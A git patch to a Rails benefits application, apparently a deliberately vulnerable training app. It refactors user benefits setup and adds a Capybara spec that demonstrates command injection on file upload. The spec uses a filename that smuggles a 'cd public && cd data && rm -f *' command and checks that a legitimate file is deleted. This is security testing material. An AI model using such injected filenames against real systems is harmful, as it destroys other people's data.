From e0bca0139ef9e7a791600b13b3ea8cbb07f73c89 Mon Sep 17 00:00:00 2001 From: chrismo Date: Fri, 27 Sep 2013 14:59:30 -0500 Subject: [PATCH] Added command injection Capybara spec. --- app/controllers/users_controller.rb | 5 +--- app/models/user.rb | 11 +++++-- spec/features/command_injection_spec.rb | 39 +++++++++++++++++++++++++ 3 files changed, 49 insertions(+), 6 deletions(-) create mode 100644 spec/features/command_injection_spec.rb diff --git a/app/controllers/users_controller.rb b/app/controllers/users_controller.rb index b52a43b..d5ae600 100755 --- a/app/controllers/users_controller.rb +++ b/app/controllers/users_controller.rb @@ -9,10 +9,7 @@ class UsersController < ApplicationController def create user = User.new(params[:user]) - user.build_retirement(POPULATE_RETIREMENTS.shuffle.first) - user.build_paid_time_off(POPULATE_PAID_TIME_OFF.shuffle.first).schedule.build(POPULATE_SCHEDULE.shuffle.first) - user.build_work_info(POPULATE_WORK_INFO.shuffle.first) - user.performance.build(POPULATE_PERFORMANCE.shuffle.first) + user.build_benefits_data if user.save session[:user_id] = user.user_id redirect_to home_dashboard_index_path diff --git a/app/models/user.rb b/app/models/user.rb index a9ecca8..c4b7f64 100755 --- a/app/models/user.rb +++ b/app/models/user.rb @@ -16,8 +16,15 @@ class User < ActiveRecord::Base has_one :paid_time_off, :foreign_key => :user_id, :primary_key => :user_id, :dependent => :destroy has_one :work_info, :foreign_key => :user_id, :primary_key => :user_id, :dependent => :destroy has_many :performance, :foreign_key => :user_id, :primary_key => :user_id, :dependent => :destroy - - + + + def build_benefits_data + build_retirement(POPULATE_RETIREMENTS.shuffle.first) + build_paid_time_off(POPULATE_PAID_TIME_OFF.shuffle.first).schedule.build(POPULATE_SCHEDULE.shuffle.first) + build_work_info(POPULATE_WORK_INFO.shuffle.first) + performance.build(POPULATE_PERFORMANCE.shuffle.first) + end + private def full_name diff --git a/spec/features/command_injection_spec.rb b/spec/features/command_injection_spec.rb new file mode 100644 index 0000000..186524a --- /dev/null +++ b/spec/features/command_injection_spec.rb @@ -0,0 +1,39 @@ +require 'spec_helper' +require 'tmpdir' + +feature 'command injection' do + before do + User.delete_all + Rails.application.load_seed + @normal_user = User.new(:first_name => 'Joe', :last_name => 'Schmoe', + :email => 'joe@schmoe.com', :password => 'aoeuaoeu', :password_confirmation => 'aoeuaoeu') + @normal_user.build_benefits_data + @normal_user.save! + end + + scenario 'injection attack on file upload', :js => true do + visit '/' + within('.signup') do + fill_in 'email', :with => 'joe@schmoe.com' + fill_in 'password', :with => 'aoeuaoeu' + end + click_on 'Login' + + legit_file = File.join(Rails.root, 'public', 'data', 'legit.txt') + File.open(legit_file, 'w') { |f| f.puts 'totes legit' } + + visit "/users/#{@normal_user.user_id}/benefit_forms" + Dir.mktmpdir do |dir| + hackety_file = File.join(dir, '; cd public && cd data && rm -f * ;') + File.open(hackety_file, 'w') { |f| f.print 'mwahaha' } + within('.new_benefits') do + attach_file 'benefits_upload', hackety_file + find(:xpath, "//input[@id='benefits_backup']", :visible => false).set 'true' + end + save_screenshot('screenshot.before.upload.png') + click_on 'Start Upload' + end + save_screenshot('screenshot.after.upload.png') + File.exists?(legit_file).should be_false + end +end \ No newline at end of file